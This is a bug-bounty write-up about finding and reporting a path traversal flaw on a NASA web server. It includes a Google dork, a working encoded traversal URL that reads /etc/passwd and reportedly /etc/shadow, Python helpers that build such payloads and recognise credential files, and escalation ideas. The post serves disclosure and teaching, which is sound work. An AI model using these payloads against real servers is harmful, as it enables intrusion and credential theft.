Hacking into NASA - Reading sensitive files via Path Traversal



This post covers how I was able to read sensitive server-side files on a NASA web server, which became my first critical, accepted submission on Bugcrowd: https://bugcrowd.com/J3554R

Google dorking

While Google dorking, I was specifically looking for file parameters, so I used the following query to search for the filename parameter in NASA’s subdomains:

site:nasa.gov inurl:filename -modis -wiki -visualization -construction
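
The query above follows a simple pattern: one `site:` filter, one `inurl:` filter, and a `-term` exclusion for each noisy result set. As a minimal sketch (the `build_dork` helper is hypothetical, not part of any tool I used), the same string can be assembled like this, which makes it easy to keep adding exclusions while narrowing results:

```python
def build_dork(site: str, param: str, exclude: list[str]) -> str:
    """Compose a search query: site filter, inurl filter, then -term exclusions."""
    parts = [f"site:{site}", f"inurl:{param}"]
    parts += [f"-{term}" for term in exclude]
    return " ".join(parts)


# Rebuilds the exact query used in this post.
query = build_dork(
    "nasa.gov",
    "filename",
    ["modis", "wiki", "visualization", "construction"],
)
print(query)
# site:nasa.gov inurl:filename -modis -wiki -visualization -construction
```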

I narrowed the results until I found one that looked interesting because its filename parameter loaded an HTML file:

https://spotthestation.nasa.gov/country_options_html.cfm?filename=country_options.html



I sent the URL above to Caido’s Replay tab and experimented with it there, then sent it over to the Automate tab.
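
Experimenting with the request mostly means swapping the value of the filename parameter and resending it. Caido does this in its UI; the sketch below only illustrates the same substitution offline with Python's standard library. The `with_param` helper is a hypothetical name, and no request is sent.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def with_param(url: str, name: str, value: str) -> str:
    """Return `url` with query parameter `name` set to `value` (percent-encoded)."""
    parts = urlsplit(url)
    # keep_blank_values so empty parameters survive the round trip
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs = [(k, value if k == name else v) for k, v in pairs]
    if name not in {k for k, _ in pairs}:
        pairs.append((name, value))
    # urlencode percent-encodes "/" as %2F by default
    return urlunsplit(parts._replace(query=urlencode(pairs)))


base = "https://spotthestation.nasa.gov/country_options_html.cfm?filename=country_options.html"
print(with_param(base, "filename", "../country_options.html"))
```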

Fuzzing

In Caido Pro’s Automate tab, I fuzzed the filename parameter with the JHaddix LFI wordlist from PayloadsAllTheThings. The payload below returned a 200 status code:

https://spotthestation.nasa.gov/country_options_html.cfm?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
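
Wordlist entries like this one stack far more `../` steps than are probably needed. That works because climbing above the filesystem root is a no-op on POSIX systems, so a generous depth reaches `/` no matter how deep the application's directory is. Here is a rough sketch of that reasoning: `traversal_payload` and `resolve` are hypothetical helpers, `/var/www/html` is an assumed web root (I never learned the real one), and the depth of 11 is just a deliberately generous value.

```python
import posixpath
from urllib.parse import quote, unquote


def traversal_payload(target: str, depth: int) -> str:
    """Prefix `target` with `depth` parent-directory steps and percent-encode it."""
    raw = "../" * depth + target.lstrip("/")
    # safe="" forces "/" to be encoded as %2F, as in the payload above
    return quote(raw, safe="")


def resolve(base_dir: str, payload: str) -> str:
    """Show where the decoded payload lands if naively joined onto base_dir."""
    return posixpath.normpath(posixpath.join(base_dir, unquote(payload)))


print(traversal_payload("/etc/passwd", 3))  # ..%2F..%2F..%2Fetc%2Fpasswd

# Assumed web root, for illustration only.
print(resolve("/var/www/html", traversal_payload("/etc/passwd", 11)))  # /etc/passwd
print(resolve("/var/www/html", traversal_payload("/etc/passwd", 2)))   # /var/etc/passwd
```

With too few steps the path stays inside the directory tree and points at a file that does not exist, which is why the wordlist entries err on the side of many.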

Unexpected Privileges

When I discovered the path traversal, I noticed something strange: I was able to read /etc/shadow and other files that should only be readable by root. This suggests that the web server was running as root.
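
A 200 status on its own does not show which file came back, so it helps to check the response body's shape. On Linux, `/etc/passwd` lines have 7 colon-separated fields and `/etc/shadow` lines have 9. The sketch below is a heuristic built on that fact, not what I actually ran; the helper names are hypothetical and the sample lines are made up, not taken from the target.

```python
def field_counts(body: str) -> set[int]:
    """Return the set of colon-separated field counts across non-empty lines."""
    return {len(line.split(":")) for line in body.splitlines() if line.strip()}


def looks_like_passwd(body: str) -> bool:
    # passwd(5): name:password:UID:GID:GECOS:home:shell
    return field_counts(body) == {7}


def looks_like_shadow(body: str) -> bool:
    # shadow(5): nine fields, the trailing ones are often empty
    return field_counts(body) == {9}


# Made-up sample data for illustration.
passwd_sample = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
)
shadow_sample = "root:!:19000:0:99999:7:::\n"

print(looks_like_passwd(passwd_sample), looks_like_shadow(passwd_sample))  # True False
print(looks_like_passwd(shadow_sample), looks_like_shadow(shadow_sample))  # False True
```

A body that matches the shadow shape is the stronger signal here, since that file is normally unreadable to an unprivileged web server account.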

I did not attempt to escalate the vulnerability, as it had already been rated P1. Had I escalated, I would have tested for log poisoning and searched for sensitive files such as private keys.

Acknowledgement

This finding was a fun one. Just before going to sleep, I Google dorked for the filename parameter and, to my surprise, found a vulnerable domain. As thanks, I received a Letter of Appreciation, which I recently framed :)